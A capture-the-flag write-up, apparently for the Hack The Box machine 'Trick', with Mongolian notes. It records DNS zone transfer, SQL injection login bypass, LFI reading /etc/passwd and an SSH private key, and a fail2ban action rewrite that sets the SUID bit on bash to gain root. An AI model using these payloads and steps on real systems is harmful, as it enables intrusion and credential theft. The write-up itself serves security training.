1. IP Address
# Machine Address
10.10.11.166
# Local Address
10.10.14.29
2. Nmap
nmap -sV -sC -oA nmap/trick 10.10.11.166
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-16 23:30 EDT
Nmap scan report for 10.10.11.166
Host is up (0.23s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 61:ff:29:3b:36:bd:9d:ac:fb:de:1f:56:88:4c:ae:2d (RSA)
| 256 9e:cd:f2:40:61:96:ea:21:a6:ce:26:02:af:75:9a:78 (ECDSA)
|_ 256 72:93:f9:11:58:de:34:ad:12:b5:4b:4a:73:64:b9:70 (ED25519)
25/tcp open smtp Postfix smtpd
|_smtp-commands: debian.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
53/tcp open domain ISC BIND 9.11.5-P4-5.1+deb10u7 (Debian Linux)
| dns-nsid:
|_ bind.version: 9.11.5-P4-5.1+deb10u7-Debian
80/tcp open http nginx 1.14.2
|_http-title: Coming Soon - Start Bootstrap Theme
|_http-server-header: nginx/1.14.2
Service Info: Host: debian.localdomain; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.76 seconds
3. Feroxbuster & ffuf & dig
feroxbuster -u http://10.10.11.166 -w /opt/SecLists/Discovery/Web-Content/raft-medium-directories.txt
───────────────────────────┬──────────────────────
🎯 Target Url │ http://10.10.11.166
🚀 Threads │ 50
📖 Wordlist │ /opt/SecLists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ [200, 204, 301, 302, 307, 308, 401, 403, 405, 500]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.3.3
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Cancel Menu™
──────────────────────────────────────────────────
301 7l 12w 185c http://10.10.11.166/js
301 7l 12w 185c http://10.10.11.166/css
301 7l 12w 185c http://10.10.11.166/assets
301 7l 12w 185c http://10.10.11.166/assets/img
[####################] - 2m 149995/149995 0s found:4 errors:8
[####################] - 2m 29999/29999 193/s http://10.10.11.166
[####################] - 2m 29999/29999 194/s http://10.10.11.166/js
[####################] - 2m 29999/29999 193/s http://10.10.11.166/css
[####################] - 2m 29999/29999 193/s http://10.10.11.166/assets
[####################] - 2m 29999/29999 193/s http://10.10.11.166/assets/img
trick.htb -г etc/hosts дотор хуулах
Subdomain шалгах: ffuf
ffuf -c -u http://trick.htb/ -H "Host: FUZZ.trick.htb" -w /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -fs 5480
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://10.10.11.166/
:: Wordlist : FUZZ: /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
:: Header : Host: FUZZ.10.10.11.166
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
:: Filter : Response size: 5480
________________________________________________
:: Progress: [4989/4989] :: Job [1/1] :: 173 req/sec :: Duration: [0:00:29] :: Errors: 0 ::
dig
dig axfr trick.htb @10.10.11.166
; <<>> DiG 9.16.22-Debian <<>> axfr trick.htb @10.10.11.166
;; global options: +cmd
trick.htb. 604800 IN SOA trick.htb. root.trick.htb. 5 604800 86400 2419200 604800
trick.htb. 604800 IN NS trick.htb.
trick.htb. 604800 IN A 127.0.0.1
trick.htb. 604800 IN AAAA ::1
preprod-payroll.trick.htb. 604800 IN CNAME trick.htb.
trick.htb. 604800 IN SOA trick.htb. root.trick.htb. 5 604800 86400 2419200 604800
;; Query time: 228 msec
;; SERVER: 10.10.11.166#53(10.10.11.166)
;; WHEN: Sun Jul 17 00:22:31 EDT 2022
;; XFR size: 6 records (messages 1, bytes 231)
preprod-payroll.trick.htb - subdomain
4. SQL Injection
4.1 SQL Injection
POST /ajax.php?action=login HTTP/1.1
Host: preprod-payroll.trick.htb:
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 53
Origin: http://preprod-payroll.trick.htb
DNT: 1
Connection: close
Referer: http://preprod-payroll.trick.htb/login.php
Cookie: PHPSESSID=i20dsqchbqo41pnnt04etht7bo
username=admin&password=admin
sqlmap -r login.req --level 5 --risk 3 --threads 10
энд доор байгаа нь логин хийгдээгүй.
sqlmap identified the following injection point(s) with a total of 733 HTTP(s) requests:
---
Parameter: username (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: username=admin' OR NOT 9977=9977-- iBdY&password=admin
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: username=admin' OR (SELECT 8386 FROM(SELECT COUNT(*),CONCAT(0x71786b7071,(SELECT (ELT(8386=8386,1))),0x716b6b7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- tdzQ&password=admin
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=admin' AND (SELECT 1569 FROM (SELECT(SLEEP(5)))MHct)-- pTTW&password=admin
---
[00:47:01] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.14.2
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[00:47:02] [INFO] fetched data logged to text files under '/home/va4mi/.local/share/sqlmap/output/preprod-payroll.trick.htb'
[00:47:02] [WARNING] your sqlmap version is outdated
[*] ending @ 00:47:02 /2022-07-17/
Үүгээр логин хийсэн:
'or 1=1 -- -
# username: 'or 1=1 -- -
# password: admin
login хийгээд авсан creds: Administrator - Enemigosss
4.2 PHP Filter
http://preprod-payroll.trick.htb/index.php?page=php://filter/convert.base64-encode/resource=index
root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologinbin:x:2:2:bin:/bin:/usr/sbin/nologinsys:x:3:3:sys:/dev:/usr/sbin/nologinsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/usr/sbin/nologinman:x:6:12:man:/var/cache/man:/usr/sbin/nologinlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologinmail:x:8:8:mail:/var/mail:/usr/sbin/nologinnews:x:9:9:news:/var/spool/news:/usr/sbin/nologinuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologinproxy:x:13:13:proxy:/bin:/usr/sbin/nologinwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologinbackup:x:34:34:backup:/var/backups:/usr/sbin/nologinlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologinirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologingnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologinnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin_apt:x:100:65534::/nonexistent:/usr/sbin/nologinsystemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologinsystemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologinsystemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologinmessagebus:x:104:110::/nonexistent:/usr/sbin/nologintss:x:105:111:TPM2 software stack,,,:/var/lib/tpm:/bin/falsednsmasq:x:106:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologinusbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologinrtkit:x:108:114:RealtimeKit,,,:/proc:/usr/sbin/nologinpulse:x:109:118:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologinspeech-dispatcher:x:110:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/falseavahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologinsaned:x:112:121::/var/lib/saned:/usr/sbin/nologincolord:x:113:122:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologingeoclue:x:114:123::/var/lib/geoclue:/usr/sbin/nologinhplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/falseDebian-gdm:x:116:124:Gnome Display Manager:/var/lib/gdm3:/bin/falsesystemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologinmysql:x:117:125:MySQL Server,,,:/nonexistent:/bin/falsesshd:x:118:65534::/run/sshd:/usr/sbin/nologinpostfix:x:119:126::/var/spool/postfix:/usr/sbin/nologinbind:x:120:128::/var/cache/bind:/usr/sbin/nologinmichael:x:1001:1001::/home/michael:/bin/bash
http://preprod-payroll.trick.htb/manage_employee.php?id=1%20union%20select%201,2,load_file(%27/etc/nginx/sites-available/default%27),4,5,6,7,8
server { listen 80 default_server; listen [::]:80 default_server; server_name trick.htb; root /var/www/html; index index.html index.htm index.nginx-debian.html; server_name _; location / { try_files $uri $uri/ =404; } location ~ \.php$ { include snippets/fastcgi-php.conf; fastcgi_pass unix:/run/php/php7.3-fpm.sock; }}server { listen 80; listen [::]:80; server_name preprod-marketing.trick.htb; root /var/www/market; index index.php; location / { try_files $uri $uri/ =404; } location ~ \.php$ { include snippets/fastcgi-php.conf; fastcgi_pass unix:/run/php/php7.3-fpm-michael.sock; }}server { listen 80; listen [::]:80; server_name preprod-payroll.trick.htb; root /var/www/payroll; index index.php; location / { try_files $uri $uri/ =404; } location ~ \.php$ { include snippets/fastcgi-php.conf; fastcgi_pass unix:/run/php/php7.3-fpm.sock; }}
preprod-marketing.trick.htb - subdimain
4.3 LFI
http://preprod-marketing.trick.htb/index.php?page=php://filter/convert.base64-encode/resource=....//....//....//....//....//....//....//....//....//etc/passwd
etc/passwd
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin messagebus:x:104:110::/nonexistent:/usr/sbin/nologin tss:x:105:111:TPM2 software stack,,,:/var/lib/tpm:/bin/false dnsmasq:x:106:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin rtkit:x:108:114:RealtimeKit,,,:/proc:/usr/sbin/nologin pulse:x:109:118:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin speech-dispatcher:x:110:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin saned:x:112:121::/var/lib/saned:/usr/sbin/nologin colord:x:113:122:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin geoclue:x:114:123::/var/lib/geoclue:/usr/sbin/nologin hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false Debian-gdm:x:116:124:Gnome Display Manager:/var/lib/gdm3:/bin/false systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin mysql:x:117:125:MySQL Server,,,:/nonexistent:/bin/false sshd:x:118:65534::/run/sshd:/usr/sbin/nologin postfix:x:119:126::/var/spool/postfix:/usr/sbin/nologin bind:x:120:128::/var/cache/bind:/usr/sbin/nologin michael:x:1001:1001::/home/michael:/bin/bash
id_rsa
http://preprod-marketing.trick.htb/index.php?page=php://filter/convert.base64-encode/resource=....//....//....//....//....//....//....//....//....//home/michael/.ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZ**********************
-----END OPENSSH PRIVATE KEY-----
ssh login
ssh -i id_rsa michael@trick.htb
user.txt
8273f35**********
5. Privilege escalation
groups
michael security
sudo -l
Matching Defaults entries for michael on trick:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User michael may run the following commands on trick:
(root) NOPASSWD: /etc/init.d/fail2ban restart
fail2ban
fail2ban/ firefox-esr/ fonts/ foomatic/ fstab fuse.conf fwupd/
michael@trick:~$ ls -lh /etc/fail2ban/
total 60K
drwxrwx--- 2 root security 4.0K Jul 26 15:39 action.d
-rw-r--r-- 1 root root 2.3K Jul 26 15:39 fail2ban.conf
drwxr-xr-x 2 root root 4.0K Jul 26 15:39 fail2ban.d
drwxr-xr-x 3 root root 4.0K Jul 26 15:39 filter.d
-rw-r--r-- 1 root root 23K Jul 26 15:39 jail.conf
drwxr-xr-x 2 root root 4.0K Jul 26 15:39 jail.d
-rw-r--r-- 1 root root 645 Jul 26 15:39 paths-arch.conf
-rw-r--r-- 1 root root 2.8K Jul 26 15:39 paths-common.conf
-rw-r--r-- 1 root root 573 Jul 26 15:39 paths-debian.conf
-rw-r--r-- 1 root root 738 Jul 26 15:39 paths-opensuse.conf
drwxrwx--- 2 root security 4.0K Jul 26 15:39 action.d
iptables-multiport.conf -г tmp руу хуулаад өөрчлөлт оруулах
cp /etc/fail2ban/action.d/iptables-multiport.conf /tmp/
cd tmp
vi iptables-multiport.conf
# өөрчлөх actionban
# actionban = chmod +s /bin/bash
rm -f /etc/fail2ban/action.d/iptables-multiport.conf
cp iptables-multiport.conf /etc/fail2ban/action.d/iptables-multiport.conf
sudo /etc/init.d/fail2ban restart
hydra
# local vm
hydra -l michael -P /usr/share/wordlists/rockyou.txt ssh://10.10.11.166
# machine vm
michael@trick:/tmp$ ls -l /bin/bash
-rwsr-sr-x 1 root root 1168776 Apr 18 2019 /bin/bash
/bin/bash -p
bash-5.0# whoami
root
root.txt
4dba7ffb*****